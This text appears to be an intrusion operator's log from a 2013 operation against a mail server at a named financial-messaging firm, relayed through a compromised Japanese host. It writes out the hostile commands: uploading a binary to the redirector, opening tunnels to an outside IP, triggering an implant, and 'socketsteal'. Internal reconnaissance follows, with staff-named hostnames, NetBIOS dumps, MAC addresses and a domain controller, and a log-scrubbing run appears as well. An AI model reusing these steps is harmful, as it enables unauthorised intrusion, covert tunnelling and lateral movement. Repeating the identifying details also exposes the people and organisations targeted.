176 lines
5.5 KiB
Text
176 lines
5.5 KiB
Text
ISP: LK
|
|
City:
|
|
Phone:
|
|
ISP IP: 186.120.114.169
|
|
Source IP:
|
|
FINAL target IP:
|
|
Ops Machine: LOCALHOST.LOCALDOMAIN
|
|
Redirecting Method 1: PITCHIMPAIR
|
|
Redirect Host 1: 210.135.90.41
|
|
Redirect Target 1: 192.168.1.3
|
|
|
|
|
|
BEGIN UNIX OPNOTES:
|
|
|
|
Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) :
|
|
--> 210.135.90.41 cnt1.din.or.jp pitchimpair unix successful
|
|
---> 192.168.1.3 endxbmail001.eastnets.com jeepflea_market windows successful
|
|
Ops Machine: WO
|
|
Results:
|
|
|
|
PROJECT=JEEPFLEA_MARKET
|
|
OPUSER=85521
|
|
OPSCHEDULE=13082113184448
|
|
SCRUBVER=6.007000008
|
|
|
|
|
|
======================= P0
|
|
--- 210.135.90.41 --- cnt1
|
|
=======================
|
|
ourtn -Y5U /current/up/noserver-x86sol2.8 -wBIN 210.135.90.41
|
|
2013-08-29 02:44:00 UTC -- on target
|
|
2013-08-29 02:46:02 UTC -- w
|
|
Uptime: 106 day(s), 0:15:26
|
|
2013-08-29 02:57:51 UTC -- tunnels
|
|
-tunnel
|
|
l 110 213.132.40.101 110 38951
|
|
-rawsend 666
|
|
|
|
|
|
2013-08-29 04:06:03 UTC -- checking some others
|
|
-ping 80.227.254.201
|
|
ICMP Reply (80.227.254.201) 195.906 ms 80.227.254.201 > 210.135.90.41 (TTL 51)
|
|
-ping -r 80.227.254.201 -i -p 48600
|
|
ICMP Reply (80.227.254.201) 1.4294166 s 80.227.254.201 > 210.135.90.41 (TTL 51)
|
|
.... no other open ports
|
|
|
|
|
|
|
|
2013-08-29 04:27:35 UTC -- another target 80.227.254.202
|
|
-ping -r 80.227.254.202 -t -p 2194
|
|
80.227.254.202:2194 -> 210.135.90.41:15563 SYN ACK (port 2194 open)
|
|
-ping -r 80.227.254.202 -t -p 2443
|
|
80.227.254.202:2443 -> 210.135.90.41:15563 SYN ACK (port 2443 open)
|
|
|
|
|
|
2013-08-29 05:39:46 UTC -- preburn checks
|
|
2013-08-29 05:39:54 UTC -- bb
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
LOCALHOST.LOCALDOMAIN: scrubhands v. 6.007000008 20130829-0238
|
|
###################
|
|
SCRUBHANDS v6.007000008 (suite v6.7.0.08 run in /192.168.254.71) command line:
|
|
:
|
|
/usr/local/bin/scrubhands -t -S 13082113184448 -I 85521 -P JEEPFLEA_MARKET -n 200.42.213.11,200.42.213.21 186.120.114.169/240/174
|
|
###################
|
|
Final lines of bwmonitor.txt:
|
|
Thu Aug 29 05:43:04 UTC 2013
|
|
eth0 bytes (MB) packets kbps (kBps) kbps-1m kbps-10m kbps-hr
|
|
TX 3429926 (3.3) 13314 0.0 (0.0) 1.3 0.8 0.9
|
|
RX 4484806 (4.3) 12814 0.0 (0.0) 5.0 1.7 1.5
|
|
|
|
###################################################
|
|
PROJECT: jeepflea_market
|
|
DATE: 02:42 AM 08/29/2013
|
|
OPUSER: 85521
|
|
OPSCHEDULE: 13082113184448
|
|
#Op Status: Unsuccessful
|
|
#Non-Standard: True
|
|
###################################################
|
|
Targets:
|
|
|
|
|
|
|
|
Results:
|
|
|
|
|
|
|
|
======================= T1
|
|
--- 192.168.1.3 --- endxbmail001
|
|
=======================
|
|
2:58 AM 8/29/2013 --- trigger sent
|
|
3:01 AM 8/29/2013 -- failed with only forward tunnel
|
|
3:01 AM 8/29/2013 -- trying with rawsend
|
|
3:03 AM 8/29/2013 -- hadouken... socketsteal w/ 110
|
|
Uptime: 95 days, 19:0:10
|
|
3:10 AM 8/29/2013 -- Kaspersky Endpoint Security 8.1.0.831
|
|
3:17 AM 8/29/2013 -- hour clean
|
|
3:20 AM 8/29/2013 -- looking for targs
|
|
nslookup endxb-kbaluyot - 192.168.153.144
|
|
nslookup kbaluyot - 10.10.10.118
|
|
nslookup managment - failed
|
|
nslookup endjuy - failed
|
|
nslookup endxb-asanghvi - failed
|
|
nslookup asanghvi - failed
|
|
nslookup juy - 10.10.10.117
|
|
nslookup vmailbox2 - 192.168.2.12
|
|
nslookup endxb-msyed - 10.10.10.74
|
|
nslookup msyed - failed
|
|
|
|
3:25 AM 8/29/2013 -- scanning 192.168.153.144
|
|
ping - failed
|
|
rpc 192.168.153.144 1 445 - failed
|
|
3:31 AM 8/29/2013 -- scanning some more targs
|
|
ping 10.10.10.117
|
|
REPLY from 10.10.10.117 -> 192.168.1.3 -- TTL: 63
|
|
netbios -target 10.10.10.117 - failed
|
|
rpc 10.10.10.117 1 445 - failed
|
|
ping 10.10.10.1 - failed
|
|
ping 10.10.10.118 - failed
|
|
ping 192.168.2.12 - failed
|
|
ping 10.10.10.74 - failed
|
|
ping 80.227.254.243 - failed
|
|
4:20 AM 8/29/2013 -- trying some fws
|
|
banner -ip 80.227.254.201 -tcp -port 2443 - can't reach network
|
|
ping 172.16.104.17 - failed
|
|
|
|
|
|
5:12 AM 8/29/2013 -- seeing if they are in
|
|
REPLY from 10.10.10.118 -> 192.168.1.3 -- TTL: 127
|
|
netbios -target 10.10.10.118
|
|
---------------------------------------------------------------------
|
|
ENDXB-COBAS UNIQUE REGISTERED Workstation Service
|
|
EASTNETS GROUP REGISTERED Domain Name
|
|
ENDXB-COBAS UNIQUE REGISTERED File Server Service
|
|
EASTNETS GROUP REGISTERED Browser Service Elections
|
|
|
|
Adapter Address: 00.26.c6.38.98.30
|
|
Adapter Type : Ethernet Adapter
|
|
|
|
netbios -target 192.168.153.144 - fail
|
|
rpc 10.10.10.118 1 445
|
|
|
|
5:22 AM 8/29/2013 -- netbios -target 10.10.10.23
|
|
ENDXB-CALTAKI UNIQUE REGISTERED Workstation Service
|
|
EASTNETS GROUP REGISTERED Domain Name
|
|
ENDXB-CALTAKI UNIQUE REGISTERED File Server Service
|
|
EASTNETS GROUP REGISTERED Browser Service Elections
|
|
|
|
Adapter Address: 9c.b7.0d.17.7b.e6
|
|
Adapter Type : Ethernet Adapter
|
|
|
|
5:31 AM 8/29/2013 -- netbios -target 192.168.2.10
|
|
---------------------------------------------------------------------
|
|
VDC04 UNIQUE REGISTERED Workstation Service
|
|
EASTNETS GROUP REGISTERED Domain Name
|
|
EASTNETS GROUP REGISTERED Domain Controller
|
|
VDC04 UNIQUE REGISTERED File Server Service
|
|
|
|
Adapter Address: 00.0c.29.8d.e3.3a
|
|
Adapter Type : Ethernet Adapter
|
|
|
|
5:37 AM 8/29/2013
|
|
|